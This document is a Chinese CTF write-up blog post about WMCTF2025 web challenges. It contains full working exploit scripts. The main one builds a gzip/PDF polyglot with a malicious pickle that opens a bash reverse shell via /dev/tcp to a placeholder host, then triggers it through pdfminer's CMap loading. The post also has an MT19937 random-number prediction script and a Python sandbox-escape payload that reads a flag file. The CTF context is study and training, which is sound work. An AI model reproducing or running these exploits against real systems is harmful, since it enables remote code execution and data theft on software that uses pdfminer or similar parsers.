WMCTF2025-WEB-Learning

前言

简单看看。

pdf2text

pickle找链子打反序列化。

最后的pickle.loads在:

image-20250926162003698

能参考到:

pdfminer.six/pdfminer/cmapdb.py at 51683b2528e2aa685dd8b9e61f6ccf9f76a59a62 · pdfminer/pdfminer.six · GitHub

可以跟一下 Gadget 调用链:

1
2
3
4
5
6
7
8
9
high_level.py::extract_pages()
pdfinterp.py::PDFPageInterpreter.process_page(page)
pdfinterp.py::PDFPageInterpreter.render_contents(resources, contents)
pdfinterp.py::PDFPageInterpreter.init_resources(resources)
pdfinterp.py::PDFResourceManager.get_font(objid, spec)
pdffont.py::PDFCIDFont.__init__(rsrcmgr, spec, strict)
pdffont.py::PDFCIDFont.get_cmap_from_spec(spec, strict)
cmapdb.py::CMapDB.get_cmap(cmap_name)
cmapdb.py::CMapDB._load_data(name)

image-20250926162041089

image-20250926162136128

image-20250926162155329

image-20250926162214328

image-20250926162228313

image-20250926162244289

image-20250926162252269

image-20250926162301023

image-20250926162315188

思路就是先打一个gzip压缩并能绕过PDF检测的含恶意Opcode数据文件进去(可以手搓也可pickle.dumps生成),至此留下恶意pickle数据;

之后再上传一个恶意 PDF 文件,触发上述 Gadget 链末端的 pickle.loads 反序列化,实现 RCE。

注意 pdfminer 会在文件前约 1KB 的范围内扫描 %PDF-,而不要求它从 offset 0 开始;一旦找到就按 PDF 规范继续解析。据此可以构造一个类似 polyglot 的 evil.pickle.gz:它既是合法的 PDF,又能被 gzip 按规范读取。

PDF Name 对象里本来不能直接写 `/`(过不去),但生成 PDF 时 /Encoding 需要指向 pickle.gz 的绝对路径,所以可以直接用 `#2F` 对 `/` 进行转义,绕过 PDF Name 对象的限制:

EXP

genPickle.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import zlib, struct, pickle, binascii

def build_pdf(abs_base: int) -> bytes:
    """Build a minimal one-page PDF whose object offsets are shifted by ``abs_base``.

    The PDF is meant to be embedded inside another container, so every
    offset written into the cross-reference data is the position inside
    the returned bytes plus ``abs_base`` (the number of container bytes
    that precede the PDF).

    Args:
        abs_base: Byte offset at which the returned PDF will start inside
            the enclosing file.

    Returns:
        The PDF bytes: header, objects 1-5, a compressed cross-reference
        stream (object 6) and the ``startxref`` trailer.
    """
    header = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"

    def obj(n: int, body: bytes) -> bytes:
        # Wrap a body as indirect object "n 0".
        return f"{n} 0 obj\n".encode() + body + b"\nendobj\n"

    page = (
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
        b"/Resources << /Font << /F1 4 0 R >> >> /Contents 5 0 R >>"
    )
    stream = b"BT /F1 12 Tf (hello polyglot) Tj ET"
    objs = [
        obj(1, b"<< /Type /Catalog /Pages 2 0 R >>"),
        obj(2, b"<< /Type /Pages /Count 1 /Kids [3 0 R] >>"),
        obj(3, page),
        obj(4, b"<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>"),
        obj(5, b"<< /Length %d >>\nstream\n" % len(stream) + stream + b"\nendstream"),
    ]

    # Record where each object starts, expressed as an absolute offset in
    # the enclosing file rather than relative to the PDF header.
    offsets_abs = []
    cursor_abs = abs_base + len(header)
    for o in objs:
        offsets_abs.append(cursor_abs)
        cursor_abs += len(o)
    body = header + b"".join(objs)

    # xref stream (/W [1 4 2]): type (1 byte) + offset (4 bytes, big-endian)
    # + generation (2 bytes) per entry.
    entries = [b"\x01" + struct.pack(">I", off) + b"\x00\x00" for off in offsets_abs]
    xref_stream = zlib.compress(b"".join(entries))
    xref_obj = (
        b"6 0 obj\n"
        b"<< /Type /XRef /Size 7 /Root 1 0 R /W [1 4 2] /Index [1 5] "
        b"/Filter /FlateDecode /Length " + str(len(xref_stream)).encode() + b" >>\nstream\n" +
        xref_stream + b"\nendstream\nendobj\n"
    )

    # startxref must also be absolute: it points at object 6 in the enclosing file.
    startxref_abs = abs_base + len(body)
    trailer = b"startxref\n" + str(startxref_abs).encode() + b"\n%%EOF\n"
    return body + xref_obj + trailer

def build_gzip_with_extra(extra_pdf: bytes, payload: bytes) -> bytes:
    """Build a gzip member that carries ``extra_pdf`` in its FEXTRA header field.

    Layout of the result: 10-byte fixed header (FLG has the FEXTRA bit
    set), 2-byte little-endian extra length, the extra bytes, the raw
    DEFLATE stream of ``payload``, then CRC32 and size of ``payload``.
    The extra bytes therefore start at offset 12 of the returned data.

    Args:
        extra_pdf: Bytes stored verbatim in the extra field.
        payload: Data that a gzip reader gets back after decompression.

    Returns:
        The complete gzip member.

    Raises:
        ValueError: If ``extra_pdf`` does not fit the 16-bit length field.
    """
    ID1, ID2, CM = 0x1f, 0x8b, 8
    FLG, MTIME, XFL, OS = 0x04, 0, 0, 255
    if len(extra_pdf) > 65535:
        raise ValueError("FEXTRA >65535")

    header = b"".join((
        bytes([ID1, ID2, CM, FLG]),
        struct.pack("<I", MTIME),
        bytes([XFL, OS]),
        struct.pack("<H", len(extra_pdf)),
        extra_pdf,
    ))

    # wbits=-15 yields a raw DEFLATE stream; the gzip framing is added by hand.
    comp = zlib.compressobj(level=9, wbits=-15)
    deflated = comp.compress(payload) + comp.flush()

    crc = binascii.crc32(payload) & 0xffffffff
    isize = len(payload) & 0xffffffff
    trailer = struct.pack("<II", crc, isize)

    return header + deflated + trailer

if __name__ == "__main__":
    # Command run by the CTF target when the pickle is loaded; "vps/port"
    # is a placeholder to be replaced with the listener address.
    cmd = "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'"

    # os.system() returns 0 on success, so "or" makes the expression
    # evaluate to the dict. NOTE(review): presumably the loader expects a
    # mapping back from pickle.loads -- confirm against pdfminer's cmapdb.py.
    expr = (
        "__import__('os').system(%r) or "
        "{'decode': (lambda self, b: [])}"
    ) % cmd

    class POC:
        """Object whose pickle form evaluates ``expr`` when it is loaded."""

        def __reduce__(self):
            import builtins
            return (builtins.eval, (expr,))

    payload = pickle.dumps(POC(), protocol=2)

    # 12 = 10-byte fixed gzip header + 2-byte extra-length field, i.e. the
    # offset at which build_gzip_with_extra places the PDF bytes.
    pdf = build_pdf(abs_base=12)
    poly = build_gzip_with_extra(extra_pdf=pdf, payload=payload)

    # Validate the polyglot before anything is written to disk.
    assert poly[:4] == b"\x1f\x8b\x08\x04"
    assert poly.find(b"%PDF-") != -1 and poly.find(b"%PDF-") < 1024

    with open("evil.pickle.gz", "wb") as f:
        f.write(poly)

genPDF.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import io

def encode_pdf_name_abs(abs_path: str) -> str:
    """Encode ``abs_path`` as a single PDF name token.

    Every byte of the UTF-8 encoded path that is not a regular PDF name
    character (anything outside ``!``..``~``, the delimiters
    ``( ) < > [ ] { } / %`` and ``#`` itself) is written as ``#XX`` with
    two uppercase hex digits, so the whole path stays one name object.

    Args:
        abs_path: Path to embed, e.g. ``"/tmp/x"``.

    Returns:
        The name token including its leading ``/``, e.g. ``"/#2Ftmp#2Fx"``.
    """
    must_escape = "#/%()<>[]{}"
    pieces = ["/"]
    for byte in abs_path.encode("utf-8"):
        char = chr(byte)
        if 0x21 <= byte <= 0x7E and char not in must_escape:
            pieces.append(char)
        else:
            pieces.append(f"#{byte:02X}")
    return "".join(pieces)

def build_trigger_pdf(cmap_abs_no_ext: str) -> bytes:
    """Build a one-page PDF whose Type0 font names ``cmap_abs_no_ext`` as its /Encoding.

    The path is turned into a PDF name with ``encode_pdf_name_abs`` and
    placed in the font dictionary (object 5). The page content draws one
    glyph with that font.

    Args:
        cmap_abs_no_ext: Path written into /Encoding.
            NOTE(review): the parameter name suggests the consumer appends
            the file extension itself -- confirm against the target parser.

    Returns:
        The PDF bytes: header, objects 1-6, a classic xref table and trailer.
    """
    enc_name = encode_pdf_name_abs(cmap_abs_no_ext)
    header = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"

    def obj(n: int, body: bytes) -> bytes:
        # Wrap a body as indirect object "n 0".
        return f"{n} 0 obj\n".encode() + body + b"\nendobj\n"

    page = (
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
        b"/Resources << /Font << /F1 5 0 R >> >> /Contents 4 0 R >>"
    )
    stream = b"BT /F1 12 Tf (A) Tj ET"
    font_dict = (
        f"<< /Type /Font /Subtype /Type0 /BaseFont /Identity-H "
        f"/Encoding {enc_name} /DescendantFonts [6 0 R] >>"
    ).encode()
    objs = [
        obj(1, b"<< /Type /Catalog /Pages 2 0 R >>"),
        obj(2, b"<< /Type /Pages /Count 1 /Kids [3 0 R] >>"),
        obj(3, page),
        obj(4, b"<< /Length %d >>\nstream\n" % len(stream) + stream + b"\nendstream"),
        obj(5, font_dict),
        obj(6, b"<< /Type /Font /Subtype /CIDFontType2 /BaseFont /Dummy /CIDSystemInfo << /Registry (Adobe) /Ordering (Identity) /Supplement 0 >> >>"),
    ]

    buf = io.BytesIO()
    buf.write(header)
    offsets = []
    for o in objs:
        # The buffer position before the write is the object's file offset.
        offsets.append(buf.tell())
        buf.write(o)

    xref_start = buf.tell()
    # Seven entries: the free entry for object 0 plus objects 1-6.
    buf.write(b"xref\n0 7\n")
    buf.write(b"0000000000 65535 f \n")
    for off in offsets:
        buf.write(f"{off:010d} 00000 n \n".encode())
    buf.write(b"trailer\n<< /Size 7 /Root 1 0 R >>\n")
    buf.write(f"startxref\n{xref_start}\n%%EOF\n".encode())
    return buf.getvalue()

if __name__ == "__main__":
    # Path handed to build_trigger_pdf, given without a file extension.
    abs_no_ext = "/proc/self/cwd/uploads/evil"
    with open("trigger.pdf", "wb") as f:
        f.write(build_trigger_pdf(abs_no_ext))
1
2
3
curl -sS -F "file=@evil.pickle.gz;type=application/pdf;filename=evil.pickle.gz"   http://localhost:11451/upload | sed -n '1,80p'

curl -sS -F "file=@trigger.pdf;type=application/pdf;filename=trigger.pdf" http://localhost:11451/upload | sed -n '1,120p'

image-20250926162922074

这道感觉还好,毕竟很多都可以用现在的ai拷打出来。。。(

guess

随机数的一个 trick:拿到连续 624 个 32 位输出之后,就可以还原 MT19937 的内部状态,从而预测后续的随机数;

题目里给的是 `__builtin__`(比 `__builtins__` 少了个 s),所以是个误导项。。。

Breaking Python’s PRNG with a few values and no bruteforce

EXP

等爆破吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pyrandcracker import RandCracker
import time, random, requests, json, os
from tqdm import *

url = 'http://localhost:11452'

# Collect 624 consecutive user IDs from the register endpoint.
# NOTE(review): assumes each user_id is one 32-bit output of the server's
# random module -- confirm against the challenge source.
data = []

for i in tqdm(range(624)):
    res = requests.post(f'{url}/register', json={
        'username': str(os.urandom(10)),
        'password': '123'
    })

    try:
        user_id = int(res.json()['user_id'])
    except Exception as e:
        # A missing sample cannot be papered over: the values submitted to
        # the cracker must be complete, so stop instead of reusing an
        # earlier user_id.
        print(res.text)
        raise SystemExit(f"registration {i} did not return a user_id") from e

    data.append(user_id)
    time.sleep(0.1)

# Initialise the predictor.
rc = RandCracker()

for num in data:
    # 19968 bits are submitted in total (624 values of 32 bits each).
    rc.submit(num)
# Check whether the state is solvable and solve it automatically.
rc.check()

key = rc.rnd.getrandbits(32)
print(f"predict next random number is {key}")

payload = '''
[k for i,k in enumerate({}.__class__.__base__.__subclasses__()) if '__init__' in k.__dict__ and 'wrapper' not in k.__init__.__str__()][0].__init__.__globals__['__builtins__']['__import__']('os').system('mkdir /app/static/ && cat /flag > /app/static/1.txt')
'''
# Alternative payload:
# payload = "[cls for cls in ().__class__.__base__.__subclasses__() if cls.__name__=='Popen'][0]('mkdir -p static && cat /flag > static/flag.txt', shell=True)"

res = requests.post(f'{url}/api', json={
    'key': key,
    'payload': payload
})

print(res.text)

res = requests.get(f'{url}/static/1.txt')

print(res.text)

EzParquet

欧阳学长太牛了。。又给秒了www

但既然官方都不放wp,那我不贴了hhh,等那边修了之后直接看官方的复现吧

打的时候因为我在windows上的IDEA跑的,所以需要下一个winutils.exe到hadoop文件夹并且写到环境变量里(也可以不用,System设置就行了)

之后就是生成一个parquet文件,直接上传上去让它解析就可以反弹shell了:

image-20250927001455201

image-20250927001312238

RustDesk

(待复现)

safeline(unsolved)

雷池都来了。。。

做不了做不了

参考:

WMCTF2025 Official WriteUp - W&M Team

Syclover-WP

WMCTF2025 Writeup - 星盟安全团队

WMCTF 2025 Web Writeup - L1nq - 博客园

WMCTF 2025 Web Writeup - L1nq - 博客园

WMCTF2025-Writeup by 0psu3 - lzz0403的技术博客


WMCTF2025-WEB-Learning
https://eddiemurphy89.github.io/2025/09/26/WMCTF2025-WEB-Learning/
作者
EddieMurphy
发布于
2025年9月26日
许可协议